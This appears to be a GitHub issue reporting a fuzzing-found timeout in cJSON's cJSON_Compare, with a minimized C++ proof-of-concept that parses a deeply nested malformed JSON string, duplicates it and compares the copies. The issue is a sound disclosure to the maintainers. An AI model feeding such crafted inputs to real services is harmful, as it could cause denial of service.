Timeout error found in cJSON_Compare #950
Description
Dear developers,
I found a timeout error in the cJSON_Compare API when fuzzing the cJSON library.
The following is the minimized POC code:
#include <fuzzer/FuzzedDataProvider.h>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <string>
#include <vector>
#include "cjson/cJSON.h"
int main() {
bool case_sensitive_operations = true;
bool recurse_duplicate = true;
uint8_t operation_selector = 5;
// Consume variable-size data for JSON strings and object keys
std::string initial_json = "{\t\"%q\":{\t\"ky\"\001:{\"e\"\t:{\"ey\"\001:{\"\377\377\":{\"e\":{\"\037\"\001:{\"e\":{\"k\"\001:{\"e\"\t:{\t\"\"\001:{\"\377\377\"\001:{\"y\"\001:{\"seye\"\t:{\t\"ke\"\001:{\"\377k\"\001:{\"ke8\"\001:{\t\"%v\"\t:{\t\"key\"\001:{\"\377\377\377\037\"\001:{\"e\"\t:{\t\"k\"\001:{\"e\"\t:{\t\"k\"\001:{\"\377\377\377\"\001:{\"y\"\t:{\t\"ey\"\001:{\"\377\377\377\037\"\001:{\"e\"\t:{\"k\"\001:{\"e\"\t:{\t\"k\":{}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}{\".t\000\000\000\377\377\377}";
// Create initial JSON object using cJSON_Parse
cJSON* root = nullptr;
if (!initial_json.empty()) {
root = cJSON_Parse(initial_json.c_str());
}
// Create a duplicate of the object using cJSON_Duplicate
cJSON* duplicated_object = cJSON_Duplicate(root, recurse_duplicate ? 1 : 0);
// Compare the original and duplicate objects using cJSON_Compare
if (duplicated_object != nullptr) {
cJSON_bool comparison_result = cJSON_Compare(root, duplicated_object, case_sensitive_operations ? 1 : 0);
(void)comparison_result; // Suppress unused variable warning
}
cleanup:
// Clean up all allocated memory
if (root != nullptr) {
cJSON_Delete(root);
}
if (duplicated_object != nullptr) {
cJSON_Delete(duplicated_object);
}
return 0;
}